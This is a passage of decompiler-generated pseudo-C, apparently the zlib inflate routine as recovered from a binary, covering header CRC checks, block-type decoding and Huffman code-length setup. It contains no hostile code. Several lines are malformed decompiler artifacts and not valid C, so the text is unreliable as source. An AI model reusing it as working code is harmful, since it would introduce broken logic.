                                                                                        										goto L88;
                                                                                        									} else {
                                                                                        										L75:
                                                                                        										_t177 = __ecx + 0x44; // 0x98de8cd
                                                                                        										__edx =  *_t177;
                                                                                        										__eflags =  *(__ecx + 0x44) - __ebx;
                                                                                        										 *(__ebp - 0x34) =  *_t177;
                                                                                        										__edx = __ebx;
                                                                                        										_t180 = __ecx + 0x44; // 0x98de8cd
                                                                                        										__edx =  <=  ?  *_t180 : __ebx;
                                                                                        										 *(__ebp - 0x2c) = __edx;
                                                                                        										__eflags = __edx;
                                                                                        										if(__edx != 0) {
                                                                                        											__eflags =  *(__ecx + 0x24);
                                                                                        											__edi =  *(__ebp - 0x14);
                                                                                        											if( *(__ecx + 0x24) != 0) {
                                                                                        												_t184 = __ecx + 0x24; // 0x5051ffff
                                                                                        												__ebx =  *_t184;
                                                                                        												__ebx =  *( *_t184 + 0x10);
                                                                                        												__eflags = __ebx;
                                                                                        												 *(__ebp - 0x14) = __ebx;
                                                                                        												__ebx =  *(__ebp - 0x10);
                                                                                        												if(__eflags != 0) {
                                                                                        													_t188 = __ecx + 0x24; // 0x5051ffff
                                                                                        													__ecx =  *_t188;
                                                                                        													__eax =  *(__ecx + 0x14);
                                                                                        													__eax =  *(__ecx + 0x14) -  *(__ebp - 0x34);
                                                                                        													__ecx =  *(__ecx + 0x18);
                                                                                        													 *(__ebp - 0x34) = __eax;
                                                                                        													__eflags = __eax - __ecx;
                                                                                        													__eax =  *(__ebp - 0x34);
                                                                                        													if(__eflags <= 0) {
                                                                                        														__ecx = __edx;
                                                                                        													} else {
                                                                                        														__ecx = __ecx - __eax;
                                                                                        													}
                                                                                        													__eax = __eax +  *(__ebp - 0x14);
                                                                                        													__eflags = __eax;
                                                                                        													__eax = memcpy(__eax, __edi, __ecx);
                                                                                        													__ecx =  *(__ebp - 0xc);
                                                                                        													__esp = __esp + 0xc;
                                                                                        													__edx =  *(__ebp - 0x2c);
                                                                                        													_t197 = __ecx + 0x14; // 0xfff84d8d
                                                                                        													__eax =  *_t197;
                                                                                        												}
                                                                                        											}
                                                                                        											__eflags = __eax & 0x00000200;
                                                                                        											if((__eax & 0x00000200) != 0) {
                                                                                        												__eflags =  *(__ecx + 0xc) & 0x00000004;
                                                                                        												if(( *(__ecx + 0xc) & 0x00000004) != 0) {
                                                                                        													_push(__edx);
                                                                                        													_push(__edi);
                                                                                        													_t203 = __ecx + 0x1c; // 0x10482bff
                                                                                        													__eax = E0018BB60( *_t203);
                                                                                        													__ecx =  *(__ebp - 0xc);
                                                                                        													 *(__ecx + 0x1c) = __eax;
                                                                                        												}
                                                                                        											}
                                                                                        											__eax =  *(__ebp - 0x2c);
                                                                                        											__ebx = __ebx - __eax;
                                                                                        											__edi = __edi + __eax;
                                                                                        											 *(__ebp - 0x10) = __ebx;
                                                                                        											_t208 = __ecx + 0x44;
                                                                                        											 *_t208 =  *(__ecx + 0x44) - __eax;
                                                                                        											__eflags =  *_t208;
                                                                                        											 *(__ebp - 0x14) = __edi;
                                                                                        										}
                                                                                        										_t211 = __ecx + 0x44; // 0x98de8cd
                                                                                        										__eax =  *_t211;
                                                                                        										__eflags =  *_t211;
                                                                                        										if( *_t211 != 0) {
                                                                                        											goto L101;
                                                                                        										} else {
                                                                                        											goto L87;
                                                                                        										}
                                                                                        									}
                                                                                        									goto L360;
                                                                                        								case 6:
                                                                                        									L88:
                                                                                        									__eflags =  *(__ecx + 0x14) & 0x00000800;
                                                                                        									if(( *(__ecx + 0x14) & 0x00000800) == 0) {
                                                                                        										L111:
                                                                                        										_t266 = __ecx + 0x24; // 0x5051ffff
                                                                                        										__eax =  *_t266;
                                                                                        										__eflags = __eax;
                                                                                        										if(__eax != 0) {
                                                                                        											 *(__eax + 0x1c) = 0;
                                                                                        										}
                                                                                        										goto L113;
                                                                                        									} else {
                                                                                        										L89:
                                                                                        										__eflags = __ebx;
                                                                                        										if(__ebx == 0) {
                                                                                        											goto L101;
                                                                                        										} else {
                                                                                        											L90:
                                                                                        											__edx = 0;
                                                                                        											__eflags = 0;
                                                                                        											while(1) {
                                                                                        												L91:
                                                                                        												__al =  *(__edi + __edx);
                                                                                        												__edx = __edx + 1;
                                                                                        												 *(__ebp - 1) = __al;
                                                                                        												_t219 = __ecx + 0x24; // 0x5051ffff
                                                                                        												__eax =  *_t219;
                                                                                        												__eflags = __eax;
                                                                                        												if(__eax != 0) {
                                                                                        													__esi =  *(__eax + 0x1c);
                                                                                        													 *(__ebp - 0x34) = __esi;
                                                                                        													__eflags = __esi;
                                                                                        													if(__esi != 0) {
                                                                                        														_t222 = __ecx + 0x44; // 0x98de8cd
                                                                                        														__esi =  *_t222;
                                                                                        														__eflags = __esi -  *((intOrPtr*)(__eax + 0x20));
                                                                                        														if(__esi <  *((intOrPtr*)(__eax + 0x20))) {
                                                                                        															__eax = __esi;
                                                                                        															__esi =  *(__ebp - 0x34);
                                                                                        															 *((char*)(__eax +  *(__ebp - 0x34))) =  *(__ebp - 1);
                                                                                        															_t227 = __ecx + 0x44;
                                                                                        															 *_t227 =  *(__ecx + 0x44) + 1;
                                                                                        															__eflags =  *_t227;
                                                                                        															__ebx =  *(__ebp - 0x10);
                                                                                        														}
                                                                                        													}
                                                                                        												}
                                                                                        												__al =  *(__ebp - 1);
                                                                                        												__eflags = __al;
                                                                                        												if(__al == 0) {
                                                                                        													break;
                                                                                        												}
                                                                                        												L96:
                                                                                        												__eflags = __edx - __ebx;
                                                                                        												if(__edx < __ebx) {
                                                                                        													continue;
                                                                                        												}
                                                                                        												break;
                                                                                        											}
                                                                                        											L97:
                                                                                        											__eflags =  *(__ecx + 0x14) & 0x00000200;
                                                                                        											__esi =  *(__ebp - 0x18);
                                                                                        											 *(__ebp - 0x3c) = __edx;
                                                                                        											if(( *(__ecx + 0x14) & 0x00000200) != 0) {
                                                                                        												__eflags =  *(__ecx + 0xc) & 0x00000004;
                                                                                        												if(( *(__ecx + 0xc) & 0x00000004) != 0) {
                                                                                        													_push(__edx);
                                                                                        													_push(__edi);
                                                                                        													_t239 = __ecx + 0x1c; // 0x10482bff
                                                                                        													__eax = E0018BB60( *_t239);
                                                                                        													__ecx =  *(__ebp - 0xc);
                                                                                        													__edx =  *(__ebp - 0x3c);
                                                                                        													 *(__ecx + 0x1c) = __eax;
                                                                                        													__al =  *(__ebp - 1);
                                                                                        												}
                                                                                        											}
                                                                                        											__ebx = __ebx - __edx;
                                                                                        											__edi = __edi + __edx;
                                                                                        											 *(__ebp - 0x10) = __ebx;
                                                                                        											 *(__ebp - 0x14) = __edi;
                                                                                        											__eflags = __al;
                                                                                        											if(__al == 0) {
                                                                                        												L113:
                                                                                        												 *(__ecx + 0x44) = 0;
                                                                                        												 *(__ecx + 4) = 0x3f3b;
                                                                                        												goto L114;
                                                                                        											} else {
                                                                                        												goto L101;
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        									goto L360;
                                                                                        								case 7:
                                                                                        									L114:
                                                                                        									__eflags =  *(__ecx + 0x14) & 0x00001000;
                                                                                        									if(( *(__ecx + 0x14) & 0x00001000) == 0) {
                                                                                        										L128:
                                                                                        										_t302 = __ecx + 0x24; // 0x5051ffff
                                                                                        										__eax =  *_t302;
                                                                                        										__eflags = __eax;
                                                                                        										if(__eax != 0) {
                                                                                        											 *(__eax + 0x24) = 0;
                                                                                        										}
                                                                                        										goto L130;
                                                                                        									} else {
                                                                                        										L115:
                                                                                        										__eflags = __ebx;
                                                                                        										if(__ebx == 0) {
                                                                                        											goto L101;
                                                                                        										} else {
                                                                                        											L116:
                                                                                        											__edx = 0;
                                                                                        											__eflags = 0;
                                                                                        											while(1) {
                                                                                        												L117:
                                                                                        												__al =  *(__edi + __edx);
                                                                                        												__edx = __edx + 1;
                                                                                        												 *(__ebp - 1) = __al;
                                                                                        												_t275 = __ecx + 0x24; // 0x5051ffff
                                                                                        												__eax =  *_t275;
                                                                                        												__eflags = __eax;
                                                                                        												if(__eax != 0) {
                                                                                        													__esi =  *(__eax + 0x24);
                                                                                        													 *(__ebp - 0x34) = __esi;
                                                                                        													__eflags = __esi;
                                                                                        													if(__esi != 0) {
                                                                                        														_t278 = __ecx + 0x44; // 0x98de8cd
                                                                                        														__esi =  *_t278;
                                                                                        														__eflags = __esi -  *((intOrPtr*)(__eax + 0x28));
                                                                                        														if(__esi <  *((intOrPtr*)(__eax + 0x28))) {
                                                                                        															__eax = __esi;
                                                                                        															__esi =  *(__ebp - 0x34);
                                                                                        															 *((char*)(__eax +  *(__ebp - 0x34))) =  *(__ebp - 1);
                                                                                        															_t283 = __ecx + 0x44;
                                                                                        															 *_t283 =  *(__ecx + 0x44) + 1;
                                                                                        															__eflags =  *_t283;
                                                                                        															__ebx =  *(__ebp - 0x10);
                                                                                        														}
                                                                                        													}
                                                                                        												}
                                                                                        												__al =  *(__ebp - 1);
                                                                                        												__eflags = __al;
                                                                                        												if(__al == 0) {
                                                                                        													break;
                                                                                        												}
                                                                                        												L122:
                                                                                        												__eflags = __edx - __ebx;
                                                                                        												if(__edx < __ebx) {
                                                                                        													continue;
                                                                                        												}
                                                                                        												break;
                                                                                        											}
                                                                                        											L123:
                                                                                        											__eflags =  *(__ecx + 0x14) & 0x00000200;
                                                                                        											__esi =  *(__ebp - 0x18);
                                                                                        											 *(__ebp - 0x3c) = __edx;
                                                                                        											if(( *(__ecx + 0x14) & 0x00000200) != 0) {
                                                                                        												__eflags =  *(__ecx + 0xc) & 0x00000004;
                                                                                        												if(( *(__ecx + 0xc) & 0x00000004) != 0) {
                                                                                        													_push(__edx);
                                                                                        													_push(__edi);
                                                                                        													_t295 = __ecx + 0x1c; // 0x10482bff
                                                                                        													__eax = E0018BB60( *_t295);
                                                                                        													__ecx =  *(__ebp - 0xc);
                                                                                        													__edx =  *(__ebp - 0x3c);
                                                                                        													 *(__ecx + 0x1c) = __eax;
                                                                                        													__al =  *(__ebp - 1);
                                                                                        												}
                                                                                        											}
                                                                                        											__ebx = __ebx - __edx;
                                                                                        											__edi = __edi + __edx;
                                                                                        											 *(__ebp - 0x10) = __ebx;
                                                                                        											 *(__ebp - 0x14) = __edi;
                                                                                        											__eflags = __al;
                                                                                        											if(__al != 0) {
                                                                                        												goto L101;
                                                                                        											} else {
                                                                                        												L127:
                                                                                        												L130:
                                                                                        												__edx =  *(__ebp - 8);
                                                                                        												 *(__ecx + 4) = 0x3f3c;
                                                                                        												goto L131;
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        									goto L360;
                                                                                        								case 8:
                                                                                        									L131:
                                                                                        									_t306 = __ecx + 0x14; // 0xfff84d8d
                                                                                        									__eax =  *_t306;
                                                                                        									 *(__ebp - 0x3c) = __eax;
                                                                                        									__eflags = __eax & 0x00000200;
                                                                                        									if((__eax & 0x00000200) == 0) {
                                                                                        										L141:
                                                                                        										_t324 = __ecx + 0x24; // 0x5051ffff
                                                                                        										__eax =  *_t324;
                                                                                        										__eflags = __eax;
                                                                                        										if(__eax != 0) {
                                                                                        											 *(__ebp - 0x3c) =  *(__ebp - 0x3c) >> 9;
                                                                                        											__edx =  *(__ebp - 0x3c) >> 0x00000009 & 0x00000001;
                                                                                        											__eflags = __edx;
                                                                                        											 *(__eax + 0x2c) = __edx;
                                                                                        											_t327 = __ecx + 0x24; // 0x5051ffff
                                                                                        											__eax =  *_t327;
                                                                                        											 *( *_t327 + 0x30) = 1;
                                                                                        										}
                                                                                        										_push(0);
                                                                                        										_push(0);
                                                                                        										__eax = E0018BB60(0);
                                                                                        										__ecx =  *(__ebp - 0xc);
                                                                                        										__edx =  *(__ebp + 8);
                                                                                        										 *(__ecx + 0x1c) = __eax;
                                                                                        										 *( *(__ebp + 8) + 0x30) = __eax;
                                                                                        										__edx =  *(__ebp - 8);
                                                                                        										 *(__ecx + 4) = 0x3f3f;
                                                                                        										goto L263;
                                                                                        									} else {
                                                                                        										L132:
                                                                                        										__eflags = __esi - 0x10;
                                                                                        										if(__esi >= 0x10) {
                                                                                        											L137:
                                                                                        											__eflags =  *(__ecx + 0xc) & 0x00000004;
                                                                                        											if(( *(__ecx + 0xc) & 0x00000004) == 0) {
                                                                                        												L140:
                                                                                        												__esi = 0;
                                                                                        												__eflags = 0;
                                                                                        												 *(__ebp - 8) = 0;
                                                                                        												 *(__ebp - 0x18) = 0;
                                                                                        												goto L141;
                                                                                        											} else {
                                                                                        												L138:
                                                                                        												_t318 = __ecx + 0x1c; // 0x10482bff
                                                                                        												__eax =  *_t318 & 0x0000ffff;
                                                                                        												__eflags = __edx - ( *_t318 & 0x0000ffff);
                                                                                        												if(__edx == ( *_t318 & 0x0000ffff)) {
                                                                                        													goto L140;
                                                                                        												} else {
                                                                                        													L139:
                                                                                        													__eax =  *(__ebp + 8);
                                                                                        													 *( *(__ebp + 8) + 0x18) = "header crc mismatch";
                                                                                        													 *(__ecx + 4) = 0x3f51;
                                                                                        												}
                                                                                        											}
                                                                                        											goto L263;
                                                                                        										} else {
                                                                                        											L133:
                                                                                        											asm("o16 nop [eax+eax]");
                                                                                        											while(1) {
                                                                                        												L134:
                                                                                        												__eflags = __ebx;
                                                                                        												if(__ebx == 0) {
                                                                                        													goto L101;
                                                                                        												}
                                                                                        												L135:
                                                                                        												__eax =  *__edi & 0x000000ff;
                                                                                        												__ecx = __esi;
                                                                                        												__eax = ( *__edi & 0x000000ff) << __cl;
                                                                                        												__esi = __esi + 8;
                                                                                        												__ebx = __ebx - 1;
                                                                                        												 *(__ebp - 0x18) = __esi;
                                                                                        												__edx = __edx + (( *__edi & 0x000000ff) << __cl);
                                                                                        												 *(__ebp - 0x10) = __ebx;
                                                                                        												__edi = __edi + 1;
                                                                                        												 *(__ebp - 8) = __edx;
                                                                                        												 *(__ebp - 0x14) = __edi;
                                                                                        												__eflags = __esi - 0x10;
                                                                                        												if(__esi < 0x10) {
                                                                                        													continue;
                                                                                        												} else {
                                                                                        													L136:
                                                                                        													__ecx =  *(__ebp - 0xc);
                                                                                        													goto L137;
                                                                                        												}
                                                                                        												goto L360;
                                                                                        											}
                                                                                        											goto L101;
                                                                                        										}
                                                                                        									}
                                                                                        									goto L360;
                                                                                        								case 9:
                                                                                        									L144:
                                                                                        									__eflags = __esi - 0x20;
                                                                                        									if(__esi >= 0x20) {
                                                                                        										L147:
                                                                                        										__ecx = __edx;
                                                                                        										__edx = __edx << 0x10;
                                                                                        										__edx & 0x0000ff00 = (__edx & 0x0000ff00) + (__edx << 0x10);
                                                                                        										__edx = __edx >> 8;
                                                                                        										__ecx = (__edx & 0x0000ff00) + (__edx << 0x10) << 8;
                                                                                        										__eax = __edx >> 0x00000008 & 0x0000ff00;
                                                                                        										__edx = __edx >> 0x18;
                                                                                        										__eax = __eax + __ecx;
                                                                                        										__ecx =  *(__ebp - 0xc);
                                                                                        										__eax = __eax + __edx;
                                                                                        										__edx =  *(__ebp + 8);
                                                                                        										 *(__ecx + 0x1c) = __eax;
                                                                                        										 *( *(__ebp + 8) + 0x30) = __eax;
                                                                                        										__edx = 0;
                                                                                        										 *(__ebp - 8) = 0;
                                                                                        										__esi = 0;
                                                                                        										__eflags = 0;
                                                                                        										 *(__ecx + 4) = 0x3f3e;
                                                                                        										goto L148;
                                                                                        									} else {
                                                                                        										while(1) {
                                                                                        											L145:
                                                                                        											__eflags = __ebx;
                                                                                        											if(__ebx == 0) {
                                                                                        												goto L101;
                                                                                        											}
                                                                                        											L146:
                                                                                        											__eax =  *__edi & 0x000000ff;
                                                                                        											__ecx = __esi;
                                                                                        											__eax = ( *__edi & 0x000000ff) << __cl;
                                                                                        											__ebx = __ebx - 1;
                                                                                        											__edx = __edx + (( *__edi & 0x000000ff) << __cl);
                                                                                        											 *(__ebp - 0x10) = __ebx;
                                                                                        											__edi = __edi + 1;
                                                                                        											 *(__ebp - 8) = __edx;
                                                                                        											__esi = __esi + 8;
                                                                                        											 *(__ebp - 0x14) = __edi;
                                                                                        											__eflags = __esi - 0x20;
                                                                                        											if(__esi < 0x20) {
                                                                                        												continue;
                                                                                        											} else {
                                                                                        												goto L147;
                                                                                        											}
                                                                                        											goto L360;
                                                                                        										}
                                                                                        										goto L101;
                                                                                        									}
                                                                                        									goto L360;
                                                                                        								case 0xa:
                                                                                        									L148:
                                                                                        									__eflags =  *(__ecx + 0x10);
                                                                                        									if( *(__ecx + 0x10) == 0) {
                                                                                        										L339:
                                                                                        										__eax =  *(__ebp + 8);
                                                                                        										__ecx =  *(__ebp - 0x24);
                                                                                        										 *(__eax + 0xc) =  *(__ebp - 0x24);
                                                                                        										__ecx =  *(__ebp - 0x1c);
                                                                                        										 *(__eax + 0x10) =  *(__ebp - 0x1c);
                                                                                        										__ecx =  *(__ebp - 0xc);
                                                                                        										 *__eax = __edi;
                                                                                        										 *(__eax + 4) = __ebx;
                                                                                        										__eax = 2;
                                                                                        										 *(__ecx + 0x40) = __esi;
                                                                                        										_pop(__esi);
                                                                                        										_pop(__ebx);
                                                                                        										 *(__ecx + 0x3c) = __edx;
                                                                                        										_pop(__edi);
                                                                                        										__esp = __ebp;
                                                                                        										_pop(__ebp);
                                                                                        										return 2;
                                                                                        									} else {
                                                                                        										L149:
                                                                                        										_push(0);
                                                                                        										__eax = E0018A060(0, 0);
                                                                                        										__ecx =  *(__ebp - 0xc);
                                                                                        										__edx =  *(__ebp + 8);
                                                                                        										 *(__ecx + 0x1c) = __eax;
                                                                                        										 *( *(__ebp + 8) + 0x30) = __eax;
                                                                                        										__edx =  *(__ebp - 8);
                                                                                        										 *(__ecx + 4) = 0x3f3f;
                                                                                        										goto L150;
                                                                                        									}
                                                                                        									goto L360;
                                                                                        								case 0xb:
                                                                                        									L150:
                                                                                        									__eax =  *(__ebp + 0xc);
                                                                                        									__eflags = __eax - 5;
                                                                                        									if(__eax == 5) {
                                                                                        										goto L101;
                                                                                        									} else {
                                                                                        										L151:
                                                                                        										__eflags = __eax - 6;
                                                                                        										if(__eax == 6) {
                                                                                        											goto L101;
                                                                                        										} else {
                                                                                        											goto L152;
                                                                                        										}
                                                                                        									}
                                                                                        									goto L360;
                                                                                        								case 0xc:
                                                                                        									L152:
                                                                                        									__eflags =  *(__ecx + 8);
                                                                                        									if( *(__ecx + 8) == 0) {
                                                                                        										L154:
                                                                                        										__eflags = __esi - 3;
                                                                                        										if(__esi >= 3) {
                                                                                        											L159:
                                                                                        											__eax = __edx;
                                                                                        											__edx = __edx >> 1;
                                                                                        											 *(__ecx + 8) = __eax;
                                                                                        											__edx = __edx & 0x00000003;
                                                                                        											switch( *((intOrPtr*)((__edx & 0x00000003) * 4 +  &M00189C3C))) {
                                                                                        												case 0:
                                                                                        													L160:
                                                                                        													__edx = __edx >> 2;
                                                                                        													__esi = __esi - 3;
                                                                                        													 *(__ecx + 4) = 0x3f41;
                                                                                        													 *(__ebp - 8) = __edx;
                                                                                        													 *(__ebp - 0x18) = __esi;
                                                                                        													goto L263;
                                                                                        												case 1:
                                                                                        													L161:
                                                                                        													__eax = E00188440(__ecx);
                                                                                        													 *(__ecx + 4) = 0x3f47;
                                                                                        													__eflags =  *(__ebp + 0xc) - 6;
                                                                                        													if( *(__ebp + 0xc) != 6) {
                                                                                        														goto L165;
                                                                                        													} else {
                                                                                        														L162:
                                                                                        														__edx = __edx >> 2;
                                                                                        														__esi = __esi - 3;
                                                                                        														 *(__ebp - 8) = __edx;
                                                                                        														goto L101;
                                                                                        													}
                                                                                        													goto L360;
                                                                                        												case 2:
                                                                                        													L163:
                                                                                        													__edx = __edx >> 2;
                                                                                        													__esi = __esi - 3;
                                                                                        													 *(__ecx + 4) = 0x3f44;
                                                                                        													 *(__ebp - 8) = __edx;
                                                                                        													 *(__ebp - 0x18) = __esi;
                                                                                        													goto L263;
                                                                                        												case 3:
                                                                                        													L164:
                                                                                        													__eax =  *(__ebp + 8);
                                                                                        													 *( *(__ebp + 8) + 0x18) = "invalid block type";
                                                                                        													 *(__ecx + 4) = 0x3f51;
                                                                                        													L165:
                                                                                        													__edx = __edx >> 2;
                                                                                        													__esi = __esi - 3;
                                                                                        													 *(__ebp - 8) = __edx;
                                                                                        													 *(__ebp - 0x18) = __esi;
                                                                                        													goto L263;
                                                                                        											}
                                                                                        										} else {
                                                                                        											L155:
                                                                                        											while(1) {
                                                                                        												L156:
                                                                                        												__eflags = __ebx;
                                                                                        												if(__ebx == 0) {
                                                                                        													goto L101;
                                                                                        												}
                                                                                        												L157:
                                                                                        												__eax =  *__edi & 0x000000ff;
                                                                                        												__ecx = __esi;
                                                                                        												__eax = ( *__edi & 0x000000ff) << __cl;
                                                                                        												__ebx = __ebx - 1;
                                                                                        												__edx = __edx + (( *__edi & 0x000000ff) << __cl);
                                                                                        												 *(__ebp - 0x10) = __ebx;
                                                                                        												__edi = __edi + 1;
                                                                                        												 *(__ebp - 8) = __edx;
                                                                                        												__esi = __esi + 8;
                                                                                        												 *(__ebp - 0x14) = __edi;
                                                                                        												__eflags = __esi - 3;
                                                                                        												if(__esi < 3) {
                                                                                        													continue;
                                                                                        												} else {
                                                                                        													L158:
                                                                                        													__ecx =  *(__ebp - 0xc);
                                                                                        													goto L159;
                                                                                        												}
                                                                                        												goto L360;
                                                                                        											}
                                                                                        											goto L101;
                                                                                        										}
                                                                                        									} else {
                                                                                        										L153:
                                                                                        										__esi = __esi & 0x00000007;
                                                                                        										__edx = __edx >> __cl;
                                                                                        										__esi = __esi - (__esi & 0x00000007);
                                                                                        										__ecx =  *(__ebp - 0xc);
                                                                                        										 *(__ebp - 8) = __edx;
                                                                                        										 *(__ebp - 0x18) = __esi;
                                                                                        										 *(__ecx + 4) = 0x3f4e;
                                                                                        										goto L263;
                                                                                        									}
                                                                                        									goto L360;
                                                                                        								case 0xd:
                                                                                        									goto L0;
                                                                                        								case 0xe:
                                                                                        									L171:
                                                                                        									 *(_t1014 + 4) = 0x3f43;
                                                                                        									goto L172;
                                                                                        								case 0xf:
                                                                                        									L172:
                                                                                        									_t976 =  *(_t1014 + 0x44);
                                                                                        									 *(_t1064 - 0x3c) = _t976;
                                                                                        									__eflags = _t976;
                                                                                        									if(_t976 == 0) {
                                                                                        										L175:
                                                                                        										 *(_t1014 + 4) = 0x3f3f;
                                                                                        										goto L263;
                                                                                        									} else {
                                                                                        										L173:
                                                                                        										__eflags =  *(_t1064 - 0x3c) - _t1007;
                                                                                        										_t1034 =  *(_t1064 - 0x1c);
                                                                                        										_t1003 =  <=  ?  *(_t1064 - 0x3c) : _t1007;
                                                                                        										__eflags = _t1003 - _t1034;
                                                                                        										_t1035 =  <=  ? _t1003 : _t1034;
                                                                                        										 *(_t1064 - 0x3c) = _t1035;
                                                                                        										__eflags = _t1035;
                                                                                        										if(_t1035 == 0) {
                                                                                        											goto L101;
                                                                                        										} else {
                                                                                        											L174:
                                                                                        											memcpy( *(_t1064 - 0x24), _t1048, _t1035);
                                                                                        											_t1005 =  *(_t1064 - 0x3c);
                                                                                        											_t1069 = _t1069 + 0xc;
                                                                                        											_t1014 =  *(_t1064 - 0xc);
                                                                                        											_t1007 = _t1007 - _t1005;
                                                                                        											 *(_t1064 - 0x1c) =  *(_t1064 - 0x1c) - _t1005;
                                                                                        											_t1048 = _t1048 + _t1005;
                                                                                        											 *(_t1064 - 0x24) =  *(_t1064 - 0x24) + _t1005;
                                                                                        											_t1037 =  *(_t1064 - 8);
                                                                                        											 *(_t1014 + 0x44) =  *(_t1014 + 0x44) - _t1005;
                                                                                        											 *(_t1064 - 0x10) = _t1007;
                                                                                        											 *(_t1064 - 0x14) = _t1048;
                                                                                        											goto L263;
                                                                                        										}
                                                                                        									}
                                                                                        									goto L360;
                                                                                        								case 0x10:
                                                                                        									L176:
                                                                                        									__eflags = __esi - 0xe;
                                                                                        									if(__esi >= 0xe) {
                                                                                        										L179:
                                                                                        										__eax =  *(__ebp - 0xc);
                                                                                        										__ecx = __edx;
                                                                                        										__edx = __edx >> 5;
                                                                                        										__ecx = __ecx & 0x0000001f;
                                                                                        										__edi = __edx;
                                                                                        										__ecx = __ecx + 0x101;
                                                                                        										__edi = __edx & 0x0000001f;
                                                                                        										__edx = __edx >> 5;
                                                                                        										__edi = __edi + 1;
                                                                                        										 *(__eax + 0x64) = __ecx;
                                                                                        										 *(__eax + 0x68) = __edi;
                                                                                        										__esi = __esi - 0xe;
                                                                                        										 *(__ebp - 0x3c) = __edi;
                                                                                        										__eax = __edx;
                                                                                        										__edi =  *(__ebp - 0xc);
                                                                                        										__eax = __edx & 0x0000000f;
                                                                                        										__eax = (__edx & 0x0000000f) + 4;
                                                                                        										__edx = __edx >> 4;
                                                                                        										 *(__ebp - 8) = __edx;
                                                                                        										 *(__ebp - 0x18) = __esi;
                                                                                        										 *( *(__ebp - 0xc) + 0x60) = __eax;
                                                                                        										__edi =  *(__ebp - 0x14);
                                                                                        										__eflags = __ecx - 0x11e;
                                                                                        										if(__ecx > 0x11e) {
                                                                                        											L192:
                                                                                        											__eax =  *(__ebp + 8);
                                                                                        											__ecx =  *(__ebp - 0xc);
                                                                                        											 *( *(__ebp + 8) + 0x18) = "too many length or distance symbols";
                                                                                        											 *(__ecx + 4) = 0x3f51;
                                                                                        											goto L263;
                                                                                        										} else {
                                                                                        											L180:
                                                                                        											__eflags =  *(__ebp - 0x3c) - 0x1e;
                                                                                        											if( *(__ebp - 0x3c) > 0x1e) {
                                                                                        												goto L192;
                                                                                        											} else {
                                                                                        												L181:
                                                                                        												__ecx =  *(__ebp - 0xc);
                                                                                        												 *(__ecx + 0x6c) = 0;
                                                                                        												 *(__ecx + 4) = 0x3f45;
                                                                                        												goto L182;
                                                                                        											}
                                                                                        										}
                                                                                        									} else {
                                                                                        										while(1) {
                                                                                        											L177:
                                                                                        											__eflags = __ebx;
                                                                                        											if(__ebx == 0) {
                                                                                        												goto L101;
                                                                                        											}
                                                                                        											L178:
                                                                                        											__eax =  *__edi & 0x000000ff;
                                                                                        											__ecx = __esi;
                                                                                        											__eax = ( *__edi & 0x000000ff) << __cl;
                                                                                        											__ebx = __ebx - 1;
                                                                                        											__edx = __edx + (( *__edi & 0x000000ff) << __cl);
                                                                                        											 *(__ebp - 0x10) = __ebx;
                                                                                        											__edi = __edi + 1;
                                                                                        											 *(__ebp - 8) = __edx;
                                                                                        											__esi = __esi + 8;
                                                                                        											 *(__ebp - 0x14) = __edi;
                                                                                        											__eflags = __esi - 0xe;
                                                                                        											if(__esi < 0xe) {
                                                                                        												continue;
                                                                                        											} else {
                                                                                        												goto L179;
                                                                                        											}
                                                                                        											goto L360;
                                                                                        										}
                                                                                        										goto L101;
                                                                                        									}
                                                                                        									goto L360;
                                                                                        								case 0x11:
                                                                                        									L182:
                                                                                        									__eax =  *(__ecx + 0x6c);
                                                                                        									__eflags = __eax -  *((intOrPtr*)(__ecx + 0x60));
                                                                                        									if(__eax >=  *((intOrPtr*)(__ecx + 0x60))) {
                                                                                        										L188:
                                                                                        										__eflags = __eax - 0x13;
                                                                                        										if(__eax < 0x13) {
                                                                                        											do {
                                                                                        												L189:
                                                                                        												__eax =  *(__ecx + 0x6c);
                                                                                        												__edx = 0;
                                                                                        												__eax =  *(0x194078 +  *(__ecx + 0x6c) * 2) & 0x0000ffff;
                                                                                        												 *((short*)(__ecx + 0x74 + ( *(0x194078 +  *(__ecx + 0x6c) * 2) & 0x0000ffff) * 2)) = __dx;
                                                                                        												 *(__ecx + 0x6c) =  *(__ecx + 0x6c) + 1;
                                                                                        												__eflags =  *(__ecx + 0x6c) - 0x13;
                                                                                        											} while ( *(__ecx + 0x6c) < 0x13);
                                                                                        										}
                                                                                        										L190:
                                                                                        										__eax = __ecx + 0x534;
                                                                                        										 *(__ecx + 0x58) = 7;
                                                                                        										__edx = __ecx + 0x70;
                                                                                        										 *(__ecx + 0x50) = __eax;
                                                                                        										 *(__ecx + 0x70) = __eax;
                                                                                        										__ecx = __ecx + 0x58;
                                                                                        										 *(__ebp - 0xc) =  *(__ebp - 0xc) + 0x2f4;
                                                                                        										 *(__ebp - 0xc) =  *(__ebp - 0xc) + 0x74;
                                                                                        										__eax = E0018BE70(0,  *(__ebp - 0xc) + 0x74, 0x13, __edx, __ecx,  *(__ebp - 0xc) + 0x2f4);
                                                                                        										__ecx =  *(__ebp - 0xc);
                                                                                        										__edx =  *(__ebp - 8);
                                                                                        										 *(__ebp - 0x30) = __eax;
                                                                                        										__eflags = __eax;
                                                                                        										if(__eax == 0) {
                                                                                        											L193:
                                                                                        											 *(__ecx + 0x6c) = 0;
                                                                                        											 *(__ecx + 4) = 0x3f46;
                                                                                        											 *(__ebp - 0x2c) = 0x3f46;
                                                                                        											goto L194;
                                                                                        										} else {
                                                                                        											L191:
                                                                                        											__eax =  *(__ebp + 8);
                                                                                        											 *( *(__ebp + 8) + 0x18) = "invalid code lengths set";
                                                                                        											 *(__ecx + 4) = 0x3f51;
                                                                                        											goto L263;
                                                                                        										}
                                                                                        									} else {
                                                                                        										do {
                                                                                        											L183:
                                                                                        											__eflags = __esi - 3;
                                                                                        											if(__esi >= 3) {
                                                                                        												goto L187;
                                                                                        											} else {
                                                                                        												L184:
                                                                                        												while(1) {
                                                                                        													L185:
                                                                                        													__eflags = __ebx;
                                                                                        													if(__ebx == 0) {
                                                                                        														goto L101;
                                                                                        													}
                                                                                        													L186:
                                                                                        													__eax =  *__edi & 0x000000ff;
                                                                                        													__ecx = __esi;
                                                                                        													__eax = ( *__edi & 0x000000ff) << __cl;
                                                                                        													__ebx = __ebx - 1;
                                                                                        													__edx = __edx + (( *__edi & 0x000000ff) << __cl);
                                                                                        													 *(__ebp - 0x10) = __ebx;
                                                                                        													__edi = __edi + 1;
                                                                                        													 *(__ebp - 8) = __edx;
                                                                                        													__esi = __esi + 8;
                                                                                        													 *(__ebp - 0x14) = __edi;
